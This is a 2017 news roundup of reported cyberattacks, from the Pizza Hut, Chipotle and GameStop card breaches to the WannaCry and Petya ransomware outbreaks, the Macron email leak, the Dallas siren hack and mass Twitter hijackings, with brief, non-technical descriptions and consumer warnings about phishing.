The Worst Reported Hacks of 2017
Be careful what you click on.
Last year, we saw cyberattacks on Mark Zuckerberg, Olympic athletes and the DNC. We don't know what people or companies hackers will hit in 2017, but we don't need to wait long for another reminder to protect our privacy and be cautious of our online actions.
At the beginning of the year, hackers launched a major phishing scheme accessing the accounts of hundreds of Gmail users and their contacts. Also this year, we’ve seen hacking group OurMine make its 2017 debut by breaking into the WWE’s Twitter accounts and CNN’s Facebook pages.
In one of the biggest hacks yet this year, hundreds of Twitter accounts worldwide have fallen victim to Turkish hackers, posting derogatory political messages in the midst of discord between the Turkish government and the Netherlands and Germany.
Check out the worst hacks of 2017 -- so far.
Pizza HutCustomers who placed orders on Pizza Hut’s website or mobile app on Oct. 1 or 2 might be victims to hackers. On Oct. 14, Pizza Hut sent out emails to its customers, sharing that their website had been hacked two weeks prior, and customers' confidential information, including names, emails, addresses and credit card numbers, was stolen. While the company says it believes only 1 percent of people who placed orders those days had their information stolen, that’s still about 60,000 people.
yup. so they knew this happened immediately but didn't notify customers until today. my bank acct was emptied a few days ago, had no idea pic.twitter.com/xC4vhPJg3M— ????????. (@runawaywithit) October 14, 2017
Customers’ credit card information at fast-food chain Sonic Drive-In
The payment systems at fast food chain Sonic Drive-In were hacked and the credit and debit card information of up to 5 million customers were put up for sale online in early September. Sonic confirmed the breach but has not shared any additional information.
"We are working to understand the nature and scope of this issue, as we know how important this is to our guests. We immediately engaged third-party forensic experts and law enforcement when we heard from our processor,” the company said in a statement to security news website KrebsOnSecurity.
Thousands of internal documents from HBO
Hackers broke into HBO servers in late July and stole 1.5 terabytes of data. While many people feared that the hackers might spoil Game of Thrones, it turns out the hack went much further than leaked episodes. While the hackers did release episodes of Ballers, Insecure and Room 104, as well as the script for an upcoming Game of Thrones episode, more importantly they got a hold of employee data. The hackers stole “thousands of Home Box Office (HBO) internal documents,” the security company hired by HBO to prevent the information from showing up on Google shared.
The hackers allegedly leaked a senior HBO executive's personal information, including newspaper subscriptions, online banking, personal health services and more. According to Variety, hackers stole “HBO’s internal administration tools, listing employee names and email addresses and their functions within the organization.”
Theft of $32 million worth of EthereumTwo days after a hacker allegedly stole more than $7 million worth of cryptocurrency Ethereum, which is also a “decentralized platform for apps,” another hacker stole $32 million. Gavin Wood, the founder smart contract coding company Parity, which is also a Ethereum client, announced that there was a vulnerability in Parity that led to three accounts being hacked, with a total value of nearly $32 million worth of ether. The vulnerability affected Parity version 1.5 and above.
U.S. power plants
A report from the Department of Homeland Security and the FBI reveals that malware, which may have originated in Russia, has been targeting computer networks of nuclear power plants in the U.S., specifically the Wolf Creek power plant in Burlington, Kan.
Some of malware comes from phishing attempts, where hackers have created fake resumes embedded with malicious code for engineering control jobs, which they sent to engineers who have access to the confidential computer systems of major electrical grids. Hackers have also interjected in many engineers’ internet usage, redirecting their internet traffic through their own servers -- this sort of attack is called a “man-in-the-middle” attack.
Bithumb, the world's fourth largest Bitcoin exchange
Hackers broke into Bithumb, one of the world’s largest bitcoin exchanges, compromising data from more than 30,000 customers. According to the cryptocurrency news site BraveNewCoin, users’ mobile phone numbers and email addresses were leaked, and “billions” of won stolen (one billion won is equivalent to $870,000 currently). Many users were also victims of “voice phishing,” where scammers telephoned them, claimed they worked for Bithumb and stole their Bithumb funds.
It is still unknown who is behind the hack.
Not long after the WannaCry malware infected systems across the globe, a new strain of malware shut down computers around the world. “GoldenEye” is part of the Petya ransomware, which has hit systems in more than 65 countries, including large firms such as advertising agency WPP, food company Mondelez, Spanish legal firm DLA Piper and more.
The malware isn’t only attacking businesses though. In fact, the cyberattack began by infecting Ukraine’s electrical grid, airport and government offices. Workers at the Ukrainian nuclear plant in Chernobyl had to manually monitor radiation because of the malware. And after hitting Ukraine, the attack went global, also affecting Russian oil firm Rosneft, Denmark-based shipping company Maersk and major New Jersey pharmaceutical firm Merck.
Through a vulnerability in Microsoft Windows called “EternalBlue,” the ransomware takes over computers and demands $300 in Bitcoin from victims. Once one computer is hit by the malware, it spreads rapidly to others in its system.
The global ransomware attack “WannaCry” hacked thousands of Windows-based computers in mid-May. The cyber attack gated off users’ files and demanded them to pay in Bitcoin in order to get them unlocked.
According to European law enforcement agency Europol, more than 200,000 computers in more than 150 countries were victims of the hack. Victims include U.K. hospitals, FedEx and Russian Railways.
It didn’t stop there either. Months after the attack surfaced, WannaCry ransomware was also found to infect a Honda factory in Japan and traffic cameras in Australia. The attack forced Honda to shut down its plant in Sayama, Japan, for a day, and the company shared with Reuters that its systems were in fact hacked worldwide.
In Victoria, Australia, traffic camera systems used to fine motorists were also discovered to have been affected by the malware.
A large Lithuanian Plastic surgery firm
In March, a hacking group by the name Tsar Team broke into Lithuania plastic surgery firm Grozio Chirurgija’s database and stole thousands of patient photos, passport and credit card details. The hackers were demanding thousands of dollars in ransom from patients in Denmark, Germany, Norway and the U.K. In April, the group demanded 344,000 euros from the clinic.
While many patients paid the ransom, the clinic refused to succumb to the threat. As a result, the group published hundreds of the stolen photos online in April and on May 30, published more than another 25,000.
The clinic is advising people who receive ransom emails to avoid opening them or clicking any links, and instead send them to authorities.
If you visited a Chipotle restaurant between March 24 and April 17 this year, your credit card information may be subject to hackers. On May 26, Chipotle announced that it discovered malware behind a hack earlier this year. The fast-casual company said that “most” of its locations were affected, and in order to find out if your information was subjected, Chipotle has released a locator tool that lets customers check if the location they visited was a victim of the attack.
“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device,” the company said in a statement.
The company isn’t legally required to offer customers any credit protection from hacks, so it recommends filing a police report, contacting the FTC or freezing your account, reports the Verge.
Disney’s “Pirates of the Caribbean”
On May 15, hackers threatened Disney that it would release one of its upcoming movies unless the company pays a hefty ransom in Bitcoin.
The hackers were threatening to release 20-minute chunks of an unnamed film, which Deadline reported to be Pirates of the Caribbean: Dead Men Tell No Lies, which hit theaters on May 26.
However, Disney held its ground. CEO Bob Iger said the company will not be paying the ransom and is working with federal investigators.
On May 25, it was reported that the hack was a fake threat. “To our knowledge we were not hacked. We had a threat of a hack of a movie being stolen. We decided to take it seriously but not react in the manner in which the person who was threatening us had required,” Iger told Yahoo Finance.
On the eve of the French presidential election, President-Elect Emmanuel Macron was targeted by a “massive and coordinated” hacking attack. Tens of thousands of emails and other documents -- many of which were fake -- were released overnight in an alleged attempt to impact the election results in support of Marine Le Pen.
“You will find jokes, you will find tens of thousands of invoices from suppliers … and you will find hundreds of exchanges on the manifesto, on organising events. In fact, all that makes a campaign,” Mounir Mahjoubi, head of Macron’s digital team, told Radio France. “There are files that have been added to these archives … fake emails that have been added.”
The hack has been linked to Russian cybersecurity research firms that reportedly attacked Hillary Clinton’s campaign shortly before the U.S. election.
Dallas’ weather emergency sirens
False alarm, Dallas. On the night of April 7, around a quarter before midnight, all of the city’s 156 emergency weather sirens went off. There was no emergency. Blaring for an hour and a half to the city’s 1.3 million residents, city officials eventually turned off the system altogether. As it turns out, city officials ruled out a glitch in the system and named the event a hack.
“It does appear at this time it was a hack,” city spokeswoman Sana Syed shared at a news conference the following day. “And we do believe it came from the Dallas area.” Although the culprit has yet to be found, Dallas’ Mayor Mike Rawlings said the city “will work to identify and prosecute those responsible.”
Video game retailer Gamestop announced on April 7 that its online payment platform fell victim to hackers. Data from customer cards -- including card number, expiration date, name, address and alarmingly, the three-digit security code -- used to purchase items from Gamestop.com appeared to be for sale online.
In a blog post, security expert Brian Krebs shared that “Gamestop.com was likely compromised by intruders between mid-September 2016 and the first week of February 2017.”
Watch out: hackers have discovered a highly-effective phishing scheme that’s fooled users into forfeiting their login credentials. The hacker -- usually disguised as a close email contact -- is found to be sending emails with a “PDF” attachment. Upon clicking the attachment, which is not actually a PDF but appears like one, victims are led to a fake Gmail login page.
Don’t be fooled by this seemingly identical page. If you look at the browser’s URL, you’ll smell the phishy business.
The address bar says “data URI” at the beginning of it, identifying it as an imposter. Most people haven’t noticed though, instead submitting their sign-in information, essentially handing the hacker access to their accounts and all of their trusted contacts.
This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy… pic.twitter.com/MizEWYksBh— Tom Scott (@tomscott) December 23, 2016
World Wrestling Entertainment (WWE)
Last year, hacking group OurMine was the leader of some big-time, harmless hacks. As a means to promote its cyber security services, the company broke into social media accounts of big names such as Mark Zuckerberg, Marissa Mayer and Jack Dorsey.
The group recently hit its first big victim of 2017: the WWE. On Jan. 28, Twitter accounts of WWE and its affiliates were hacked, such as WWE Universe, WWE NXT, wrestler John Cena, WrestleMania, Summer Slam and the WWE itself, reports Mashable. The WWE’s Tumblr page was also compromised.
Per usual, the company didn’t break into these accounts -- which happened to all be linked through the WWE’s main account -- for malicious reasons. OurMine broke in and informed the company how unsecure its accounts are, and offered its commercial services to help. “We’re just testing your security,” posted the company -- which seems to be its well-known tagline.
Hacking group Our Mine was feeling ambitious over the Jan. 28 weekend. A day after breaking into WWE's accounts, the cyber security company went for its next victim: CNN. On Jan. 29, the main CNN facebook page, along with CNN International and CNN Politics were hacked.
These hacks appeared harmless: OurMine simply posted that it was just testing the security of the accounts and left its logo.
Indian airline IndiGo fell victim to cyber attacks twice. Most recently, the company’s Twitter account, which previously had more than 100,000 followers, got hijacked by someone who changed the handle to @activevibezzz1. Sadly, the company is having issues launching a new account too -- after its Twitter name was changed, its old handle name @IndiGo6e was up for grabs and someone quickly took ownership of it.
Less than a week before this incident, a hacker broke into the company's Twitter and began posting offensive tweets.
Hundreds of Twitter accounts
From Duke University to Justin Bieber to the Atlanta Police Department, Twitter accounts worldwide are being hijacked, with the hackers spreading a political message.
In the midst of Turkish President Recep Erdogan's diplomatic feud with the Netherlands and Germany, pro-Turkey hackers have been posting on various accounts referring to the upcoming April 16 elections, when a referendum will be held in Turkey that could give Erdogan more power.
Clearly pro-Erdogan, the hackers are breaking into accounts, posting tweets in Turkish, displaying the swastika, referring to Adolf Hitler and using the hashtags #Nazihollanda and #Nazialmanya, which translates to “Nazi Holland” and “Nazi Germany.” The tweets also link to a video of Erdogan.
Nobody is safe, even Justin Bieber's Japanese account got hacked pic.twitter.com/urlSw4yaOy— Arjun Kharpal (@ArjunKharpal) March 15, 2017
It’s suspected that the hackers took advantage of a vulnerability in the third party Twitter analytics app Twitter Counter, which many organizations, businesses and people use. The hack seems to have hit nearly every industry -- media outlets, sports leagues, government departments, universities, fast food chains, celebrities and major brands have fallen victim. Forbes, BBC, Duke University, Justin Bieber's Japanese account, UNICEF USA, U.K. Department of Health, Atlanta Police Department, Sprint and Nike Spain, to name a few, have fallen victim to the hack.